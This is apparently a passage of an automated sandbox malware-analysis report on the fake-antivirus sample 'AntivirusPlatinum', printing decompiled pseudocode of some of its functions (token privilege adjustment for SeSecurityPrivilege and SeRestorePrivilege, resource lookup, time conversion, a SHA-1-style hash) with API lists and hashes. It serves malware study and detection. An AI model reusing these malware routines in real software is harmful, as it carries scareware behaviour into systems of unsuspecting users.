                                                                                                                                                      					if(_t11 != 0) {
                                                                                                                                                      						_v24.PrivilegeCount = 1;
                                                                                                                                                      						_v12 = 2;
                                                                                                                                                      						if(LookupPrivilegeValueA(0, "SeSecurityPrivilege",  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
                                                                                                                                                      							 *0x41486d = 1;
                                                                                                                                                      						}
                                                                                                                                                      						if(LookupPrivilegeValueA(0, "SeRestorePrivilege",  &(_v24.Privileges)) != 0) {
                                                                                                                                                      							AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                                                                      						}
                                                                                                                                                      						return CloseHandle(_v8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}








                                                                                                                                                      0x004034b3
                                                                                                                                                      0x004034b9
                                                                                                                                                      0x004034c5
                                                                                                                                                      0x004034d3
                                                                                                                                                      0x004034db
                                                                                                                                                      0x004034ef
                                                                                                                                                      0x004034f6
                                                                                                                                                      0x00403507
                                                                                                                                                      0x00403524
                                                                                                                                                      0x00403524
                                                                                                                                                      0x00403539
                                                                                                                                                      0x00403546
                                                                                                                                                      0x00403546
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403552
                                                                                                                                                      0x004034db
                                                                                                                                                      0x00403555

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?,00000000,004037BD,?,00000000,?,?), ref: 004034CC
                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004034D3
                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32 ref: 004034FD
                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403514
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040351A
                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00403535
                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403546
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040354B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Token$AdjustLookupPrivilegePrivilegesProcessValue$CloseCurrentErrorHandleLastOpen
                                                                                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                      • API String ID: 2567606174-639343689
                                                                                                                                                      • Opcode ID: c949ee787aeeb01e211e777db34c6ab15c62baebe83aeb3191ba4c1195d95a36
                                                                                                                                                      • Instruction ID: 4d87bf4ab330366511297bf3b21dea1e654d34ca96b66c7a981cdcd40eee38cc
                                                                                                                                                      • Opcode Fuzzy Hash: c949ee787aeeb01e211e777db34c6ab15c62baebe83aeb3191ba4c1195d95a36
                                                                                                                                                      • Instruction Fuzzy Hash: 9F116DB1900219BEEB00EBA49D84EFF7BACEB44349F044076A601E21A1D7B59F04CB78
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004096AF(void* __ecx) {
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				struct HINSTANCE__* _t5;
                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                      				signed int _t10;
                                                                                                                                                      				char _t12;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      
                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                      				_t5 = GetModuleHandleA(0);
                                                                                                                                                      				_t17 = "RTL";
                                                                                                                                                      				_t6 = FindResourceA(_t5, "RTL", 5);
                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                      					E00409553(_t16, "LTR",  &_v1028, 1, "LTR");
                                                                                                                                                      					_t10 = E0040A4E9( &_v1028, _t17);
                                                                                                                                                      					asm("sbb al, al");
                                                                                                                                                      					_t12 =  ~_t10 + 1;
                                                                                                                                                      					 *((char*)(_t16 + 0x10)) = _t12;
                                                                                                                                                      					return _t12;
                                                                                                                                                      				}
                                                                                                                                                      				 *((char*)(_t16 + 0x10)) = 1;
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}









                                                                                                                                                      0x004096bc
                                                                                                                                                      0x004096be
                                                                                                                                                      0x004096c6
                                                                                                                                                      0x004096cd
                                                                                                                                                      0x004096d5
                                                                                                                                                      0x004096ef
                                                                                                                                                      0x004096fc
                                                                                                                                                      0x00409703
                                                                                                                                                      0x00409705
                                                                                                                                                      0x00409707
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409707
                                                                                                                                                      0x004096d7
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00414C88), ref: 004096BE
                                                                                                                                                      • FindResourceA.KERNEL32(00000000,RTL,00000005), ref: 004096CD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindHandleModuleResource
                                                                                                                                                      • String ID: LTR$RTL
                                                                                                                                                      • API String ID: 3537982541-719208805
                                                                                                                                                      • Opcode ID: c85929189a2336619c142bfb5adf14b24fcf8cab46fe22709d53f16226de1815
                                                                                                                                                      • Instruction ID: 12f79db75577d25306824e15d06a1a3014e73688b613185c72924c9a3f94fbbd
                                                                                                                                                      • Opcode Fuzzy Hash: c85929189a2336619c142bfb5adf14b24fcf8cab46fe22709d53f16226de1815
                                                                                                                                                      • Instruction Fuzzy Hash: F9F0B4726002147ADA1066759C1AFE72A6CDB45704F04417AB309E61C2D7F89A55C7A9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040E0E1(void* __ecx) {
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				struct _SYSTEMTIME _v28;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      
                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                      				GetSystemTime( &_v28);
                                                                                                                                                      				SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                                                      				return E0040DF79(_t11, _t14,  &_v12);
                                                                                                                                                      			}







                                                                                                                                                      0x0040e0ec
                                                                                                                                                      0x0040e0ee
                                                                                                                                                      0x0040e0fc
                                                                                                                                                      0x0040e10f

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 0040E0EE
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E0FC
                                                                                                                                                        • Part of subcall function 0040DF79: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040DF8A
                                                                                                                                                        • Part of subcall function 0040DF79: FileTimeToSystemTime.KERNEL32(?,?), ref: 0040DF98
                                                                                                                                                        • Part of subcall function 0040DF79: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E00D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$File$System$Local
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2859370177-0
                                                                                                                                                      • Opcode ID: 0fbcf173760a5192ea96601a717504cfae41435c603bcbb0cce835998907240a
                                                                                                                                                      • Instruction ID: b976fda33143c74ac370e146003494d8e758708e9995241362427bb7c2108887
                                                                                                                                                      • Opcode Fuzzy Hash: 0fbcf173760a5192ea96601a717504cfae41435c603bcbb0cce835998907240a
                                                                                                                                                      • Instruction Fuzzy Hash: 21D012B290011E7BCF00E7F4DD46CCE7BBCEA44204F000062AA02F3041EA74E6458BE5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E0040D4FF(void* __ecx, void* _a4, signed int* _a8, signed int _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                      				signed int* _v20;
                                                                                                                                                      				void _v40;
                                                                                                                                                      				signed int* _t235;
                                                                                                                                                      				signed int _t243;
                                                                                                                                                      				signed int _t254;
                                                                                                                                                      				signed int _t263;
                                                                                                                                                      				signed int _t273;
                                                                                                                                                      				void* _t275;
                                                                                                                                                      				signed int _t285;
                                                                                                                                                      				signed int _t287;
                                                                                                                                                      				signed int _t291;
                                                                                                                                                      				signed int _t297;
                                                                                                                                                      				signed int* _t311;
                                                                                                                                                      				void* _t331;
                                                                                                                                                      				intOrPtr _t332;
                                                                                                                                                      				signed int _t336;
                                                                                                                                                      				signed int* _t339;
                                                                                                                                                      				signed int* _t340;
                                                                                                                                                      				signed int* _t344;
                                                                                                                                                      				signed int _t345;
                                                                                                                                                      				signed int* _t349;
                                                                                                                                                      				void* _t350;
                                                                                                                                                      				signed int _t387;
                                                                                                                                                      				signed int* _t389;
                                                                                                                                                      				signed int* _t397;
                                                                                                                                                      				signed int* _t405;
                                                                                                                                                      				signed int* _t409;
                                                                                                                                                      				signed int* _t412;
                                                                                                                                                      				signed int* _t417;
                                                                                                                                                      				void* _t418;
                                                                                                                                                      
                                                                                                                                                      				if(_a12 == 0) {
                                                                                                                                                      					_t285 = _a8;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t285 = 0x41f970;
                                                                                                                                                      					E0040A2B6(__ecx, 0x41f970, _a8, 0x40);
                                                                                                                                                      				}
                                                                                                                                                      				if( *0x41f968 == 0) {
                                                                                                                                                      					_t332 = 0;
                                                                                                                                                      					_t417 = 0x41f32c;
                                                                                                                                                      					do {
                                                                                                                                                      						_t4 = _t332 + 1; // 0x1
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						_t387 = 5;
                                                                                                                                                      						_t9 = _t332 + 2; // 0x2
                                                                                                                                                      						 *((intOrPtr*)(_t417 - 4)) = _t332;
                                                                                                                                                      						 *_t417 = _t4 % _t387;
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						_t15 = _t332 + 3; // 0x3
                                                                                                                                                      						_t417 =  &(_t417[5]);
                                                                                                                                                      						 *(_t417 - 0x10) = _t9 % _t387;
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						_t21 = _t332 + 4; // 0x4
                                                                                                                                                      						 *(_t417 - 0xc) = _t15 % _t387;
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						 *(_t417 - 8) = _t21 % _t387;
                                                                                                                                                      						if(_t332 == 0) {
                                                                                                                                                      							_t332 = 4;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t332 = _t332 - 1;
                                                                                                                                                      						}
                                                                                                                                                      					} while (_t417 < 0x41f96c);
                                                                                                                                                      					 *0x41f968 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				_t287 = 5;
                                                                                                                                                      				memcpy( &_v40, _a4, _t287 << 2);
                                                                                                                                                      				_t235 = 0x41f334;
                                                                                                                                                      				_a12 = _t285;
                                                                                                                                                      				do {
                                                                                                                                                      					_t389 = _a12;
                                                                                                                                                      					asm("ror ecx, 0x8");
                                                                                                                                                      					asm("rol edx, 0x8");
                                                                                                                                                      					_t291 =  *_t389 & 0xff00ff00 |  *_t389 & 0x00ff00ff;
                                                                                                                                                      					 *_t389 = _t291;
                                                                                                                                                      					_t33 = _t235 - 8; // 0x0
                                                                                                                                                      					_t336 =  *(_t418 +  *_t235 * 4 - 0x24);
                                                                                                                                                      					_t37 = _t235 - 4; // 0x0
                                                                                                                                                      					_a12 = _a12 + 4;
                                                                                                                                                      					_a8 = _t418 +  *_t33 * 4 - 0x24;
                                                                                                                                                      					_t47 =  &(_t235[1]); // 0x0
                                                                                                                                                      					_v12 = _t418 +  *_t47 * 4 - 0x24;
                                                                                                                                                      					_t52 = _t235 - 0xc; // 0x0
                                                                                                                                                      					_v8 = _t336;
                                                                                                                                                      					asm("rol esi, 0x5");
                                                                                                                                                      					 *_v12 =  *_v12 + (( *(_t418 +  *_t37 * 4 - 0x24) ^ _t336) &  *_a8 ^ _v8) +  *((intOrPtr*)(_t418 +  *_t52 * 4 - 0x24)) + _t291 + 0x5a827999;
                                                                                                                                                      					asm("ror dword [ecx], 0x2");
                                                                                                                                                      					_t235 =  &(_t235[5]);
                                                                                                                                                      					_t339 = 0x41f474;
                                                                                                                                                      				} while (_t235 < 0x41f474);
                                                                                                                                                      				_a12 = 0x10;
                                                                                                                                                      				do {
                                                                                                                                                      					_t65 = _a12 - 3; // 0xd
                                                                                                                                                      					_t294 = _t65;
                                                                                                                                                      					_t397 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                      					_t68 = _t294 - 5; // 0x8
                                                                                                                                                      					_t71 = _t294 + 5; // 0x12
                                                                                                                                                      					_t243 =  *(_t285 + (_t68 & 0x0000000f) * 4) ^  *(_t285 + (_t71 & 0x0000000f) * 4) ^  *(_t285 + (_t65 & 0x0000000f) * 4) ^  *_t397;
                                                                                                                                                      					asm("rol eax, 1");
                                                                                                                                                      					 *_t397 = _t243;
                                                                                                                                                      					_t76 = _t339 - 8; // 0x0
                                                                                                                                                      					_t297 =  *(_t418 +  *_t339 * 4 - 0x24);
                                                                                                                                                      					_t80 = _t339 - 4; // 0x0
                                                                                                                                                      					_a8 = _t418 +  *_t76 * 4 - 0x24;
                                                                                                                                                      					_t88 =  &(_t339[1]); // 0x0
                                                                                                                                                      					_v8 = _t418 +  *_t88 * 4 - 0x24;
                                                                                                                                                      					_t93 = _t339 - 0xc; // 0x0
                                                                                                                                                      					_v12 = _t297;
                                                                                                                                                      					asm("rol esi, 0x5");
                                                                                                                                                      					 *_v8 =  *_v8 + (( *(_t418 +  *_t80 * 4 - 0x24) ^ _t297) &  *_a8 ^ _v12) +  *((intOrPtr*)(_t418 +  *_t93 * 4 - 0x24)) + _t243 + 0x5a827999;
                                                                                                                                                      					asm("ror dword [eax], 0x2");
                                                                                                                                                      					_a12 = _a12 + 1;
                                                                                                                                                      					_t339 =  &(_t339[5]);
                                                                                                                                                      				} while (_t339 < 0x41f4c4);
                                                                                                                                                      				_a12 = 0x14;
                                                                                                                                                      				_t340 = 0x41f4c4;
                                                                                                                                                      				do {
                                                                                                                                                      					_t108 = _a12 - 3; // 0x11
                                                                                                                                                      					_t300 = _t108;
                                                                                                                                                      					_t405 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                      					_t111 = _t300 - 5; // 0xc
                                                                                                                                                      					_t112 = _t300 + 5; // 0x16
                                                                                                                                                      					_t254 =  *(_t285 + (_t111 & 0x0000000f) * 4) ^  *(_t285 + (_t112 & 0x0000000f) * 4) ^  *(_t285 + (_t108 & 0x0000000f) * 4) ^  *_t405;
                                                                                                                                                      					asm("rol eax, 1");
                                                                                                                                                      					 *_t405 = _t254;
                                                                                                                                                      					_t119 = _t340 - 8; // 0x0
                                                                                                                                                      					_a8 = _t418 +  *_t119 * 4 - 0x24;
                                                                                                                                                      					_t124 =  &(_t340[1]); // 0x0
                                                                                                                                                      					_v8 = _t418 +  *_t124 * 4 - 0x24;
                                                                                                                                                      					_t129 = _t340 - 0xc; // 0x0
                                                                                                                                                      					_t133 = _t340 - 4; // 0x0
                                                                                                                                                      					asm("rol esi, 0x5");
                                                                                                                                                      					_t143 =  *((intOrPtr*)(_t418 +  *_t129 * 4 - 0x24)) + _t254 + 0x6ed9eba1; // 0x6fd9eba1
                                                                                                                                                      					 *_v8 =  *_v8 + ( *(_t418 +  *_t133 * 4 - 0x24) ^  *(_t418 +  *_t340 * 4 - 0x24) ^  *_a8) + _t143;
                                                                                                                                                      					asm("ror dword [ecx], 0x2");
                                                                                                                                                      					_a12 = _a12 + 1;
                                                                                                                                                      					_t340 =  &(_t340[5]);
                                                                                                                                                      				} while (_t340 < 0x41f654);
                                                                                                                                                      				_t311 = 0x41f650;
                                                                                                                                                      				_a12 = 0x28;
                                                                                                                                                      				_a8 = 0x41f650;
                                                                                                                                                      				do {
                                                                                                                                                      					_t149 = _a12 - 3; // 0x25
                                                                                                                                                      					_t341 = _t149;
                                                                                                                                                      					_t409 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                      					_t152 = _t341 - 5; // 0x20
                                                                                                                                                      					_t155 = _t341 + 5; // 0x2a
                                                                                                                                                      					_t263 =  *(_t285 + (_t152 & 0x0000000f) * 4) ^  *(_t285 + (_t155 & 0x0000000f) * 4) ^  *(_t285 + (_t149 & 0x0000000f) * 4) ^  *_t409;
                                                                                                                                                      					asm("rol eax, 1");
                                                                                                                                                      					 *_t409 = _t263;
                                                                                                                                                      					_t160 = _t311 - 4; // 0x0
                                                                                                                                                      					_t161 =  &(_t311[2]); // 0x0
                                                                                                                                                      					_t344 = _t418 +  *_t160 * 4 - 0x24;
                                                                                                                                                      					_v20 = _t344;
                                                                                                                                                      					_t345 =  *_t344;
                                                                                                                                                      					_v16 = _t418 +  *_t161 * 4 - 0x24;
                                                                                                                                                      					_t173 = _t311 - 8; // 0x0
                                                                                                                                                      					_t174 =  &(_t311[1]); // 0x0
                                                                                                                                                      					_v12 = _t345;
                                                                                                                                                      					asm("rol edi, 0x5");
                                                                                                                                                      					_t185 =  *((intOrPtr*)(_t418 +  *_t173 * 4 - 0x24)) + _t263 - 0x70e44324; // -1877230372
                                                                                                                                                      					 *_v16 =  *_v16 + ( *(_t418 +  *_t174 * 4 - 0x24) & (_t345 |  *(_t418 +  *_t311 * 4 - 0x24)) | _v12 &  *(_t418 +  *_t311 * 4 - 0x24)) + _t185;
                                                                                                                                                      					asm("ror dword [eax], 0x2");
                                                                                                                                                      					_a12 = _a12 + 1;
                                                                                                                                                      					_t311 =  &(_a8[5]);
                                                                                                                                                      					_a8 = _t311;
                                                                                                                                                      				} while (_t311 < 0x41f7e0);
                                                                                                                                                      				_a12 = 0x3c;
                                                                                                                                                      				_t349 = 0x41f7e4;
                                                                                                                                                      				do {
                                                                                                                                                      					_t193 = _a12 - 3; // 0x39
                                                                                                                                                      					_t319 = _t193;
                                                                                                                                                      					_t412 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                      					_t196 = _t319 - 5; // 0x34
                                                                                                                                                      					_t197 = _t319 + 5; // 0x3e
                                                                                                                                                      					_t273 =  *(_t285 + (_t196 & 0x0000000f) * 4) ^  *(_t285 + (_t197 & 0x0000000f) * 4) ^  *(_t285 + (_t193 & 0x0000000f) * 4) ^  *_t412;
                                                                                                                                                      					asm("rol eax, 1");
                                                                                                                                                      					 *_t412 = _t273;
                                                                                                                                                      					_t204 = _t349 - 8; // 0x0
                                                                                                                                                      					_a8 = _t418 +  *_t204 * 4 - 0x24;
                                                                                                                                                      					_t209 =  &(_t349[1]); // 0x0
                                                                                                                                                      					_v16 = _t418 +  *_t209 * 4 - 0x24;
                                                                                                                                                      					_t214 = _t349 - 0xc; // 0x0
                                                                                                                                                      					_t218 = _t349 - 4; // 0x0
                                                                                                                                                      					asm("rol esi, 0x5");
                                                                                                                                                      					_t228 =  *((intOrPtr*)(_t418 +  *_t214 * 4 - 0x24)) + _t273 - 0x359d3e2a; // -882720298
                                                                                                                                                      					 *_v16 =  *_v16 + ( *(_t418 +  *_t218 * 4 - 0x24) ^  *(_t418 +  *_t349 * 4 - 0x24) ^  *_a8) + _t228;
                                                                                                                                                      					asm("ror dword [ecx], 0x2");
                                                                                                                                                      					_a12 = _a12 + 1;
                                                                                                                                                      					_t349 =  &(_t349[5]);
                                                                                                                                                      				} while (_t349 < 0x41f974);
                                                                                                                                                      				_t275 = _a4;
                                                                                                                                                      				_t331 =  &_v40 - _t275;
                                                                                                                                                      				_t350 = 5;
                                                                                                                                                      				do {
                                                                                                                                                      					 *_t275 =  *_t275 +  *((intOrPtr*)(_t331 + _t275));
                                                                                                                                                      					_t275 = _t275 + 4;
                                                                                                                                                      					_t350 = _t350 - 1;
                                                                                                                                                      				} while (_t350 != 0);
                                                                                                                                                      				return _t275;
                                                                                                                                                      			}




































                                                                                                                                                      0x0040d50c
                                                                                                                                                      0x0040d520
                                                                                                                                                      0x0040d50e
                                                                                                                                                      0x0040d513
                                                                                                                                                      0x0040d519
                                                                                                                                                      0x0040d519
                                                                                                                                                      0x0040d52a
                                                                                                                                                      0x0040d52c
                                                                                                                                                      0x0040d52e
                                                                                                                                                      0x0040d533
                                                                                                                                                      0x0040d533
                                                                                                                                                      0x0040d536
                                                                                                                                                      0x0040d539
                                                                                                                                                      0x0040d53c
                                                                                                                                                      0x0040d53f
                                                                                                                                                      0x0040d542
                                                                                                                                                      0x0040d544
                                                                                                                                                      0x0040d547
                                                                                                                                                      0x0040d54a
                                                                                                                                                      0x0040d54d
                                                                                                                                                      0x0040d550
                                                                                                                                                      0x0040d553
                                                                                                                                                      0x0040d556
                                                                                                                                                      0x0040d559
                                                                                                                                                      0x0040d55c
                                                                                                                                                      0x0040d561
                                                                                                                                                      0x0040d568
                                                                                                                                                      0x0040d563
                                                                                                                                                      0x0040d563
                                                                                                                                                      0x0040d563
                                                                                                                                                      0x0040d569
                                                                                                                                                      0x0040d571
                                                                                                                                                      0x0040d571
                                                                                                                                                      0x0040d57d
                                                                                                                                                      0x0040d581
                                                                                                                                                      0x0040d583
                                                                                                                                                      0x0040d588
                                                                                                                                                      0x0040d58b
                                                                                                                                                      0x0040d58b
                                                                                                                                                      0x0040d592
                                                                                                                                                      0x0040d59b
                                                                                                                                                      0x0040d5a4
                                                                                                                                                      0x0040d5a6
                                                                                                                                                      0x0040d5a8
                                                                                                                                                      0x0040d5ad
                                                                                                                                                      0x0040d5b1
                                                                                                                                                      0x0040d5b8
                                                                                                                                                      0x0040d5c0
                                                                                                                                                      0x0040d5c3
                                                                                                                                                      0x0040d5cc
                                                                                                                                                      0x0040d5cf
                                                                                                                                                      0x0040d5d6
                                                                                                                                                      0x0040d5de
                                                                                                                                                      0x0040d5f0
                                                                                                                                                      0x0040d5f5
                                                                                                                                                      0x0040d5f8
                                                                                                                                                      0x0040d5fb
                                                                                                                                                      0x0040d600
                                                                                                                                                      0x0040d604
                                                                                                                                                      0x0040d60b
                                                                                                                                                      0x0040d60e
                                                                                                                                                      0x0040d60e
                                                                                                                                                      0x0040d614
                                                                                                                                                      0x0040d617
                                                                                                                                                      0x0040d620
                                                                                                                                                      0x0040d62f
                                                                                                                                                      0x0040d631
                                                                                                                                                      0x0040d633
                                                                                                                                                      0x0040d635
                                                                                                                                                      0x0040d63a
                                                                                                                                                      0x0040d63e
                                                                                                                                                      0x0040d649
                                                                                                                                                      0x0040d64c
                                                                                                                                                      0x0040d655
                                                                                                                                                      0x0040d658
                                                                                                                                                      0x0040d65f
                                                                                                                                                      0x0040d667
                                                                                                                                                      0x0040d679
                                                                                                                                                      0x0040d67e
                                                                                                                                                      0x0040d681
                                                                                                                                                      0x0040d684
                                                                                                                                                      0x0040d68c
                                                                                                                                                      0x0040d694
                                                                                                                                                      0x0040d69b
                                                                                                                                                      0x0040d69d
                                                                                                                                                      0x0040d6a0
                                                                                                                                                      0x0040d6a0
                                                                                                                                                      0x0040d6a6
                                                                                                                                                      0x0040d6a9
                                                                                                                                                      0x0040d6ac
                                                                                                                                                      0x0040d6c1
                                                                                                                                                      0x0040d6c3
                                                                                                                                                      0x0040d6c5
                                                                                                                                                      0x0040d6c7
                                                                                                                                                      0x0040d6d0
                                                                                                                                                      0x0040d6d3
                                                                                                                                                      0x0040d6da
                                                                                                                                                      0x0040d6dd
                                                                                                                                                      0x0040d6e4
                                                                                                                                                      0x0040d6ef
                                                                                                                                                      0x0040d6fe
                                                                                                                                                      0x0040d705
                                                                                                                                                      0x0040d707
                                                                                                                                                      0x0040d70a
                                                                                                                                                      0x0040d70d
                                                                                                                                                      0x0040d710
                                                                                                                                                      0x0040d718
                                                                                                                                                      0x0040d71d
                                                                                                                                                      0x0040d724
                                                                                                                                                      0x0040d727
                                                                                                                                                      0x0040d72a
                                                                                                                                                      0x0040d72a
                                                                                                                                                      0x0040d730
                                                                                                                                                      0x0040d733
                                                                                                                                                      0x0040d73c
                                                                                                                                                      0x0040d74b
                                                                                                                                                      0x0040d74d
                                                                                                                                                      0x0040d74f
                                                                                                                                                      0x0040d751
                                                                                                                                                      0x0040d754
                                                                                                                                                      0x0040d75d
                                                                                                                                                      0x0040d765
                                                                                                                                                      0x0040d768
                                                                                                                                                      0x0040d76a
                                                                                                                                                      0x0040d76d
                                                                                                                                                      0x0040d770
                                                                                                                                                      0x0040d77b
                                                                                                                                                      0x0040d78b
                                                                                                                                                      0x0040d793
                                                                                                                                                      0x0040d79a
                                                                                                                                                      0x0040d7a2
                                                                                                                                                      0x0040d7a5
                                                                                                                                                      0x0040d7a8
                                                                                                                                                      0x0040d7b1
                                                                                                                                                      0x0040d7b1
                                                                                                                                                      0x0040d7ba
                                                                                                                                                      0x0040d7c1
                                                                                                                                                      0x0040d7c6
                                                                                                                                                      0x0040d7c9
                                                                                                                                                      0x0040d7c9
                                                                                                                                                      0x0040d7cf
                                                                                                                                                      0x0040d7d2
                                                                                                                                                      0x0040d7d5
                                                                                                                                                      0x0040d7ea
                                                                                                                                                      0x0040d7ec
                                                                                                                                                      0x0040d7ee
                                                                                                                                                      0x0040d7f0
                                                                                                                                                      0x0040d7f9
                                                                                                                                                      0x0040d7fc
                                                                                                                                                      0x0040d803
                                                                                                                                                      0x0040d806
                                                                                                                                                      0x0040d80d
                                                                                                                                                      0x0040d818
                                                                                                                                                      0x0040d827
                                                                                                                                                      0x0040d82e
                                                                                                                                                      0x0040d830
                                                                                                                                                      0x0040d833
                                                                                                                                                      0x0040d836
                                                                                                                                                      0x0040d839
                                                                                                                                                      0x0040d841
                                                                                                                                                      0x0040d849
                                                                                                                                                      0x0040d84b
                                                                                                                                                      0x0040d84c
                                                                                                                                                      0x0040d84f
                                                                                                                                                      0x0040d851
                                                                                                                                                      0x0040d854
                                                                                                                                                      0x0040d854
                                                                                                                                                      0x0040d85b

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
